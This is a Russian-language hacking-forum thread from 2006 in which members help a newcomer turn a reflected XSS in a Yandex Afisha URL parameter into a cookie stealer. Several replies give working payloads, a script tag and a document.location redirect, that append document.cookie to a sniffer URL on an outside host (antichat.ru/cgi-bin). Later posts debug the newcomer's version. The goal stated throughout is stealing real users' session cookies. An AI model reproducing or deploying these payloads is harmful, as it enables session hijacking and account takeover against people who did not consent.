Xss на яндексе... Требуеца помощь |
18.12.2006, 02:35
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами:
10215346
Репутация:
70
|
|
Xss на яндексе... Требуеца помощь
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!
Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать  |
|
|
18.12.2006, 02:39
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
http://forum.antichat.ru/thread19610.html
|
|
|
|
18.12.2006, 03:42
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами:
10215346
Репутация:
70
|
|
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
|
|
|
|
18.12.2006, 04:34
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
С нами:
10374086
Репутация:
1745
|
|
Просмотрел почти все темы... В принципе уяснил что к чему, но опять же в теории все слишком аморфно.. На рпактике все гораздо сложнее... Всеже попрошу составить скрипт по крайней мере для наглядности...
ЗА чем тебе писать или искать скрипт, просто на форуме есть тема где их выкладывают!
|
|
|
|
18.12.2006, 04:50
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами:
10215346
Репутация:
70
|
|
да я имею ввиду применение скрипта. ну допустим мне нада составить его так чтобы он таскал куки на мой снифер на античате. приведите мне пример на этой xss.
|
|
|
|
18.12.2006, 05:07
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами:
10215346
Репутация:
70
|
|
вобщем даже вот в чем суть вопроса- помогите составить корректный запрос чтобы с этого адреса куки уходили на сниффер...
|
|
|
|
18.12.2006, 07:21
|
|
Познающий
Регистрация: 17.12.2006
Сообщений: 32
С нами:
10210061
Репутация:
31
|
|
Сообщение от IDentety
PHP код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
Вот наша хсска... Нам нада составить ее так чтобы логи шли на сниффер... Народ, кому не лень составьте пожалуйста четкую ссылку на сниффер античата... Долблюсь ап стену уже 3 час и нифига не пойму где у меня ошибка.... Если распишите все поэтапно буду очень благодарен... В любом случае с меня + к репе!
Извиняюсь за тупые вопросы в ХSS еще плохо разбираюсь поэтому йад и стены прошу не прописывать На, лови:
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script%3E
Плюс не забудь 
|
|
|
|
18.12.2006, 10:10
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Можешь соорудить что нибудь этакое
<script>document.location="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie</script>
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 18.12.2006 в 10:21..
|
|
|
|
18.12.2006, 10:33
|
|
Познающий
Регистрация: 13.12.2006
Сообщений: 77
С нами:
10215346
Репутация:
70
|
|
вот соорудил я конструкцию такого вида
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript %20src=%22http://antichat.ru/s/мойсниф.jpg?%22+document.cookie;%3E%3C/script%3E
но отчеты не приходят.. видно гдето абшибся
|
|
|
|
18.12.2006, 10:40
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Тык неправельно ты адрес задал, надо не ../s/yoursniff.jpg а .../cgi-bin/yoursnif.jpg
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
